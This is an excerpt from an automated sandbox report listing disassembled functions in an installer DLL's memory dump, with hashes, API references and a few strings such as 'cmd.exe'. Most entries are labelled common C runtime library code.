Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: InfoLocale$_errno$AllocByteCharErrorHeapLastMultiWidefreemalloc
String ID:
API String ID: 1309137116-0
Opcode ID: 436e94cebb002656211ac615f83855e072fffab04320f2842f8a450889c355c1
Instruction ID: 9a90928fadca3bfaea65b2354fbc267cb61a2ea66039529c6e1bfa5df3b8ce18
Opcode Fuzzy Hash: 436e94cebb002656211ac615f83855e072fffab04320f2842f8a450889c355c1
Instruction Fuzzy Hash: E651A63620868886F7A39F15AD413DB73A1F74D7E8F5A8615FA1A43BD4CF74CA498700

Function 000000018001E0D0 Relevance: 12.1, APIs: 8, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 000000018002AF23
RtlLookupFunctionEntry.KERNEL32 ref: 000000018002AF42
RtlVirtualUnwind.KERNEL32 ref: 000000018002AF8E
IsDebuggerPresent.KERNEL32 ref: 000000018002B000
SetUnhandledExceptionFilter.KERNEL32 ref: 000000018002B018
UnhandledExceptionFilter.KERNEL32 ref: 000000018002B025
GetCurrentProcess.KERNEL32 ref: 000000018002B03E
TerminateProcess.KERNEL32 ref: 000000018002B04C

Memory Dump Source

Source File: 00000002.00000002.4546444804.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4546389444.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546536561.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546598306.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546651964.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerEntryFunctionLookupPresentTerminateUnwindVirtual
String ID:
API String ID: 3778485334-0
Opcode ID: 7dfd68256b6577f8bef36267e68adb4a8b092e3ee4e321cd5696b2aafa3ca8e9
Instruction ID: fc12ada8a128d6f1d404ec32f716f7f9352f897c7c547437a0ea03871e7a68a8
Opcode Fuzzy Hash: 7dfd68256b6577f8bef36267e68adb4a8b092e3ee4e321cd5696b2aafa3ca8e9
Instruction Fuzzy Hash: 5631D535104F88C6E7A29B54F8843EA73A0F78D798F518116FA8D427A5DF7DC28D8704

Function 000000018002BB84 Relevance: 12.1, APIs: 8, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 000000018002BBC3
RtlLookupFunctionEntry.KERNEL32 ref: 000000018002BBDC
RtlVirtualUnwind.KERNEL32 ref: 000000018002BC1A
IsDebuggerPresent.KERNEL32 ref: 000000018002BC61
SetUnhandledExceptionFilter.KERNEL32 ref: 000000018002BC6B
UnhandledExceptionFilter.KERNEL32 ref: 000000018002BC76
GetCurrentProcess.KERNEL32 ref: 000000018002BC8C
TerminateProcess.KERNEL32 ref: 000000018002BC9A

Memory Dump Source

Source File: 00000002.00000002.4546444804.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4546389444.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546536561.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546598306.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546651964.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerEntryFunctionLookupPresentTerminateUnwindVirtual
String ID:
API String ID: 3778485334-0
Opcode ID: 72496d450d4107c48557a8d9e9b8d31312e128fbe6be5197dd2e51a830b1c4bf
Instruction ID: c71b409959ccf73f4bc98b0901178c6aebfce8d2d3a295f4eecee81b12eb3b28
Opcode Fuzzy Hash: 72496d450d4107c48557a8d9e9b8d31312e128fbe6be5197dd2e51a830b1c4bf
Instruction Fuzzy Hash: 4E312F72608B8982DB668B55F4443DBB3A4F799784F504115EACD43B99DF78C24CCB00

Function 00000001800347B0 Relevance: 10.8, APIs: 7, Instructions: 301COMMONLIBRARYCODE

Download Yara Rule

APIs

_lock.LIBCMT ref: 00000001800347DB

Part of subcall function 0000000180035298: _errno.LIBCMT ref: 00000001800352A1

free.LIBCMT ref: 00000001800348D2

Part of subcall function 000000018001F30C: RtlFreeHeap.NTDLL(?,?,00000000,000000018002C2C0,?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018001F322
Part of subcall function 000000018001F30C: _errno.LIBCMT ref: 000000018001F32C
Part of subcall function 000000018001F30C: GetLastError.KERNEL32(?,?,00000000,000000018002C2C0,?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018001F334

Part of subcall function 000000018002BEE8: _errno.LIBCMT ref: 000000018002BF00

___lc_codepage_func.LIBCMT ref: 000000018003485B

Part of subcall function 000000018002BB84: RtlCaptureContext.KERNEL32 ref: 000000018002BBC3
Part of subcall function 000000018002BB84: RtlLookupFunctionEntry.KERNEL32 ref: 000000018002BBDC
Part of subcall function 000000018002BB84: RtlVirtualUnwind.KERNEL32 ref: 000000018002BC1A
Part of subcall function 000000018002BB84: IsDebuggerPresent.KERNEL32 ref: 000000018002BC61
Part of subcall function 000000018002BB84: SetUnhandledExceptionFilter.KERNEL32 ref: 000000018002BC6B
Part of subcall function 000000018002BB84: UnhandledExceptionFilter.KERNEL32 ref: 000000018002BC76
Part of subcall function 000000018002BB84: GetCurrentProcess.KERNEL32 ref: 000000018002BC8C
Part of subcall function 000000018002BB84: TerminateProcess.KERNEL32 ref: 000000018002BC9A

Memory Dump Source

Source File: 00000002.00000002.4546444804.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4546389444.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546536561.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546598306.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546651964.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _errno$ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerEntryErrorFreeFunctionHeapLastLookupPresentTerminateUnwindVirtual___lc_codepage_func_lockfree
String ID:
API String ID: 3702655603-0
Opcode ID: 2f966ea916f666462da1782ab5cc9371ebc527b73083383bbece24e9f1605637
Instruction ID: 9471dd814442db4a536cca14816e46c77906279b8aeb0443e37adca9e85ad162
Opcode Fuzzy Hash: 2f966ea916f666462da1782ab5cc9371ebc527b73083383bbece24e9f1605637
Instruction Fuzzy Hash: 83D1D33320468885E7B39F24E4917EB7795F38D7C0F42C116BA895B7A6CF38DA598B04

Function 0000000180035694 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 190COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 00000001800356C8

Part of subcall function 000000018002BCAC: DecodePointer.KERNEL32 ref: 000000018002BCD3

free.LIBCMT ref: 0000000180035904

Strings

cmd.exe, xrefs: 00000001800356A3

Memory Dump Source

Source File: 00000002.00000002.4546444804.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4546389444.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546536561.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546598306.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546651964.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: DecodePointer_errnofree
String ID: cmd.exe
API String ID: 3637258294-723907552
Opcode ID: 8cd250cef9dc04e1030a94fead8d514a1372542504ad5278bd05599df5ed4360
Instruction ID: 6943f989181965795582f8eaac26820451e32651ef6446f151c0a8e5233c8295
Opcode Fuzzy Hash: 8cd250cef9dc04e1030a94fead8d514a1372542504ad5278bd05599df5ed4360
Instruction Fuzzy Hash: 2C61273130468841FAE7E726A5117EF2391A78DBD0F55C936BE9947BE6CE38C7498700

Function 000000018002A29C Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 171COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 000000018001F6B0: _getptd.LIBCMT ref: 000000018001F6C6

_errno.LIBCMT ref: 000000018002A2DE

Part of subcall function 000000018002BCAC: DecodePointer.KERNEL32 ref: 000000018002BCD3

_errno.LIBCMT ref: 000000018002A31C
_errno.LIBCMT ref: 000000018002A364

Strings

e+000, xrefs: 000000018002A3F6
-, xrefs: 000000018002A458
gfff, xrefs: 000000018002A483

Memory Dump Source

Source File: 00000002.00000002.4546444804.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4546389444.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546536561.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546598306.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546651964.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _errno$DecodePointer_getptd
String ID: -$e+000$gfff
API String ID: 2834218312-2620144452
Opcode ID: 70437f3bfbfdb2c2965d6d3f53b1fd9d8e3e8069317ac65cfa6244339cf6166a
Instruction ID: a02038aa4d0300f9b50aee6095aae5c0a493ad474d81769f1ea6d53b9b79cc99
Opcode Fuzzy Hash: 70437f3bfbfdb2c2965d6d3f53b1fd9d8e3e8069317ac65cfa6244339cf6166a
Instruction Fuzzy Hash: C26108326086C846F7A7DB2998413DE7791F38A7D8F18C216FB5847B85CE39C64C8700

Function 0000000180039FD4 Relevance: 10.6, APIs: 7, Instructions: 138COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 000000018003A01A
_errno.LIBCMT ref: 000000018003A088
_errno.LIBCMT ref: 000000018003A093
_errno.LIBCMT ref: 000000018003A0C7
WideCharToMultiByte.KERNEL32 ref: 000000018003A162
GetLastError.KERNEL32 ref: 000000018003A182
_errno.LIBCMT ref: 000000018003A1A8

Memory Dump Source

Source File: 00000002.00000002.4546444804.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4546389444.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546536561.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546598306.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546651964.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _errno$ByteCharErrorLastMultiWide
String ID:
API String ID: 3895584640-0
Opcode ID: 7245fe9e3f893b78d75b3df2e8976107991caa5ac0895964952ffd918a5c7e21
Instruction ID: 0496a83d19119119c06eac124665b0f9d544e026b86ecaffa96e669938c9ee47
Opcode Fuzzy Hash: 7245fe9e3f893b78d75b3df2e8976107991caa5ac0895964952ffd918a5c7e21
Instruction Fuzzy Hash: 185191326086C84AF7F79F65E8403EFB790F38A7D0F59C115B69943AC5CE68CA498B05

Function 000000018001ED40 Relevance: 10.6, APIs: 7, Instructions: 115COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 000000018001ED71

Part of subcall function 000000018002BCAC: DecodePointer.KERNEL32 ref: 000000018002BCD3

_errno.LIBCMT ref: 000000018001EDA9

Memory Dump Source

Source File: 00000002.00000002.4546444804.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4546389444.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546536561.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546598306.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546651964.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _errno$DecodePointer
String ID:
API String ID: 2310398763-0
Opcode ID: 9971678e4432facbc1ef1fc8bffed31b4a85e9e26782f1ce22b24466a6d4ab7e
Instruction ID: 37d480c48d6613522327dc8b80719ac5bc1941a2faed874dfcc6a4ccd8653334
Opcode Fuzzy Hash: 9971678e4432facbc1ef1fc8bffed31b4a85e9e26782f1ce22b24466a6d4ab7e
Instruction Fuzzy Hash: 49418272710B8A83F7A69E35985279E3291B79D7C8F14C136BA054B686CF3CC618D700

Function 000000018002649C Relevance: 9.1, APIs: 6, Instructions: 91COMMON

Download Yara Rule

APIs

_lock.LIBCMT ref: 00000001800264BF
_errno.LIBCMT ref: 00000001800264D1

Part of subcall function 000000018002BCAC: DecodePointer.KERNEL32 ref: 000000018002BCD3

_errno.LIBCMT ref: 0000000180026510

Memory Dump Source

Source File: 00000002.00000002.4546444804.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4546389444.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546536561.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546598306.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546651964.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _errno$DecodePointer_lock
String ID:
API String ID: 2175075375-0
Opcode ID: db16a11e0748f8c7df55558d2753626681ae7582a959f48267dc8d83ede8206b
Instruction ID: 3db3c45d6a0b5cd1f105f54f4b3baf641d9be13896c0f45c2bade60435e83e15
Opcode Fuzzy Hash: db16a11e0748f8c7df55558d2753626681ae7582a959f48267dc8d83ede8206b
Instruction Fuzzy Hash: 4931A432B10B9942FB97AE6595527DE6390AB8D7C0F44C525BF084BBCADF3CCA198700

Function 000000018002A600 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 298COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 000000018001F6B0: _getptd.LIBCMT ref: 000000018001F6C6

_errno.LIBCMT ref: 000000018002A655

Part of subcall function 000000018002BCAC: DecodePointer.KERNEL32 ref: 000000018002BCD3

_errno.LIBCMT ref: 000000018002A694
_errno.LIBCMT ref: 000000018002A6D7

Strings

gfffffff, xrefs: 000000018002A9C1
0, xrefs: 000000018002A63B

Memory Dump Source

Source File: 00000002.00000002.4546444804.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4546389444.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546536561.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546598306.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546651964.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _errno$DecodePointer_getptd
String ID: 0$gfffffff
API String ID: 2834218312-1804767287
Opcode ID: aa0305aa27dcb933d0da9dfb5bb8f7d0176d6c65135dee39654fcde55db1ae09
Instruction ID: b601890787595c58531ba7e6b687c0341182e1ca22c5763c78b8363e265dfe8c
Opcode Fuzzy Hash: aa0305aa27dcb933d0da9dfb5bb8f7d0176d6c65135dee39654fcde55db1ae09
Instruction Fuzzy Hash: 47B132726087CC47FBA38B2991453AE7BA5E75A7D0F14C222EB59077D2DE38CA59C300

Function 00000001800205D8 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 147COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 00000001800205FB

Part of subcall function 000000018002BCAC: DecodePointer.KERNEL32 ref: 000000018002BCD3

_errno.LIBCMT ref: 000000018002062C
_errno.LIBCMT ref: 000000018002065F

Strings

@, xrefs: 00000001800206A2

Memory Dump Source

Source File: 00000002.00000002.4546444804.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4546389444.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546536561.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546598306.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546651964.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _errno$DecodePointer
String ID: @
API String ID: 2310398763-2766056989
Opcode ID: 65e2a0e65b8682a92b97ad27ec68b60d0671ab9fbfa8d204ae279d19c13defa3
Instruction ID: 6cf7d81aec9c8a7fb52b555c26e3c1199c8c24d09ef78c42bdf52907f5b2ca1f
Opcode Fuzzy Hash: 65e2a0e65b8682a92b97ad27ec68b60d0671ab9fbfa8d204ae279d19c13defa3
Instruction Fuzzy Hash: 21512432B1474D45FBFB8A3898557EE2390679C7D4F34C225BA5A866C2DF38C6198B00

Function 0000000180037058 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(?,?,?,?,00000000,00000001800378EC,?,?,?,?,00000000,0000000180028F80), ref: 00000001800370B3
GetLocaleInfoA.KERNEL32(?,?,?,?,00000000,00000001800378EC,?,?,?,?,00000000,0000000180028F80), ref: 00000001800370F5
GetACP.KERNEL32(?,?,?,?,00000000,00000001800378EC,?,?,?,?,00000000,0000000180028F80), ref: 0000000180037118

Strings

OCP, xrefs: 0000000180037091
ACP, xrefs: 0000000180037081

Memory Dump Source

Source File: 00000002.00000002.4546444804.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4546389444.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546536561.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546598306.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546651964.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 285159c17e2accfc9b13dbfaf6de1df71dd8840a5528aefbbd73939a99c6a5a6
Instruction ID: 31aaffd01f1e8c00c037cc1d3137d0b0bd3712a38feaaca81b6232ad461d006d
Opcode Fuzzy Hash: 285159c17e2accfc9b13dbfaf6de1df71dd8840a5528aefbbd73939a99c6a5a6
Instruction Fuzzy Hash: 22214271300A49D5FAB7DB21E9803EB6390B74C7C8F46C521AA4D47666EF28C74DC700

Function 0000000180026EEC Relevance: 7.7, APIs: 5, Instructions: 233COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 0000000180026F0F

Part of subcall function 000000018002BCAC: DecodePointer.KERNEL32 ref: 000000018002BCD3

_errno.LIBCMT ref: 0000000180026F52
__tzset.LIBCMT ref: 0000000180026F6F
_isindst.LIBCMT ref: 0000000180027018

Part of subcall function 0000000180026BD4: _errno.LIBCMT ref: 0000000180026BF6

_isindst.LIBCMT ref: 000000018002706C

Part of subcall function 00000001800351E8: _lock.LIBCMT ref: 00000001800351F6

Memory Dump Source

Source File: 00000002.00000002.4546444804.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4546389444.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546536561.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546598306.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546651964.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _errno$_isindst$DecodePointer__tzset_lock
String ID:
API String ID: 2552603377-0
Opcode ID: 94332f3981986e09bb0910da463cacfcd71f2233cd8271649ea0427451d2a9fc
Instruction ID: a068425ec057d83c032eccabfb2bcb394e40b10ab35c283d6b764921ba1d8b95
Opcode Fuzzy Hash: 94332f3981986e09bb0910da463cacfcd71f2233cd8271649ea0427451d2a9fc
Instruction Fuzzy Hash: B691F9B271074947EF9BDF29D55179A6792E7987C5F04C03AFA098A796EF38C6088B00

Function 00000001800223CC Relevance: 7.6, APIs: 5, Instructions: 105COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 00000001800223FE

Part of subcall function 000000018002BCAC: DecodePointer.KERNEL32 ref: 000000018002BCD3

_errno.LIBCMT ref: 0000000180022436

Memory Dump Source

Source File: 00000002.00000002.4546444804.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4546389444.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546536561.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546598306.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546651964.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _errno$DecodePointer
String ID:
API String ID: 2310398763-0
Opcode ID: 9d55c2a6a59a82965daf0e8e646d10d15f0e768c763823f1f9afd29687c29db6
Instruction ID: f5c319ab33e0a8075ae33812c2a92c3b1c48c1f7b9d2e96434c6b2da3a56c658
Opcode Fuzzy Hash: 9d55c2a6a59a82965daf0e8e646d10d15f0e768c763823f1f9afd29687c29db6
Instruction Fuzzy Hash: D641F472A00A5892F7B7DF65E8017AE3390A7897E4F60C312BA7547AC5CE78C6498B40

Function 000000018001EBFC Relevance: 7.6, APIs: 5, Instructions: 89COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 000000018001EC2B

Part of subcall function 000000018002BCAC: DecodePointer.KERNEL32 ref: 000000018002BCD3

_errno.LIBCMT ref: 000000018001EC5E

Memory Dump Source

Source File: 00000002.00000002.4546444804.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4546389444.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546536561.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546598306.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546651964.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _errno$DecodePointer
String ID:
API String ID: 2310398763-0
Opcode ID: 56bfbcb23a128c196e49c81069df4a7ee18435d57266e18776e5003e9f0183c1
Instruction ID: 904b913cc3ec980953253aa1da5105bbdd00c7158b6d19c9bc06cc26936a1786
Opcode Fuzzy Hash: 56bfbcb23a128c196e49c81069df4a7ee18435d57266e18776e5003e9f0183c1
Instruction Fuzzy Hash: EF319372714BD985FBA7AB71AC0279E6291B78D7C0F10C526BA4A87B85DF3CC6098701

Function 0000000180021B88 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 0000000180021BBA

Part of subcall function 000000018002BCAC: DecodePointer.KERNEL32 ref: 000000018002BCD3

_errno.LIBCMT ref: 0000000180021BED

Strings

@, xrefs: 0000000180021C1D

Memory Dump Source

Source File: 00000002.00000002.4546444804.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4546389444.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546536561.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546598306.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546651964.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _errno$DecodePointer
String ID: @
API String ID: 2310398763-2766056989
Opcode ID: e305e226cf207c6d3f1dd86a634ac54eddaa51f416a3df2b113854f6797ccea9
Instruction ID: dd94d8077e03ae22ffc14675778569cb5697c2bb140d0af9ff915d2123f11729
Opcode Fuzzy Hash: e305e226cf207c6d3f1dd86a634ac54eddaa51f416a3df2b113854f6797ccea9
Instruction Fuzzy Hash: 06412C72710A4D45FBA7CB36AC513FA635167A97E8F74C216BE29876D5DF38C2098300

Function 00000001800372F8 Relevance: 6.2, APIs: 4, Instructions: 152COMMON

Download Yara Rule

APIs

_getptd.LIBCMT ref: 000000018003731F
GetLocaleInfoA.KERNEL32 ref: 0000000180037354
GetLocaleInfoA.KERNEL32 ref: 00000001800373AC
GetLocaleInfoA.KERNEL32 ref: 00000001800374A0

Memory Dump Source

Source File: 00000002.00000002.4546444804.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4546389444.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546536561.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546598306.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546651964.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: InfoLocale$_getptd
String ID:
API String ID: 1743167714-0
Opcode ID: b4030c375111dc87c7a81313f96055d9207103059a3c94d77078ed0d4a0bec02
Instruction ID: 9853df9228a634b84d650e4cd0a57f6a8145f4ab692f0d1b0a1c4647dd7ef205
Opcode Fuzzy Hash: b4030c375111dc87c7a81313f96055d9207103059a3c94d77078ed0d4a0bec02
Instruction Fuzzy Hash: 5F614E72300A8897DBBF9A65D9443DE73A1F38C789F51811AE75D87791CF38E6688700

Function 0000000180010AB0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 0000000180010AD2
FormatMessageA.KERNEL32 ref: 0000000180010B02

Strings

system error %d, xrefs: 0000000180010B1B

Memory Dump Source

Source File: 00000002.00000002.4546444804.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4546389444.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546536561.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546598306.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546651964.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID: system error %d
API String ID: 3479602957-1688351658
Opcode ID: 0b669dc38d1b02e4621c60ae251cc2d9fe0382d15873282476e5f311bfdc800a
Instruction ID: 5165d0e7630ab715d2080139ec972a0a1eb7dfbc78c08bfca532b6b1035b4b33
Opcode Fuzzy Hash: 0b669dc38d1b02e4621c60ae251cc2d9fe0382d15873282476e5f311bfdc800a
Instruction Fuzzy Hash: 56011A31304A8882E7B29B55F49179AB2A0FB8D7C4F558125AA8907755DF79C6488B40

Function 000000018003758C Relevance: 3.1, APIs: 2, Instructions: 64COMMON

Download Yara Rule

APIs

_getptd.LIBCMT ref: 00000001800375AE
GetLocaleInfoA.KERNEL32 ref: 00000001800375E3

Memory Dump Source

Source File: 00000002.00000002.4546444804.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4546389444.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546536561.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546598306.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546651964.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

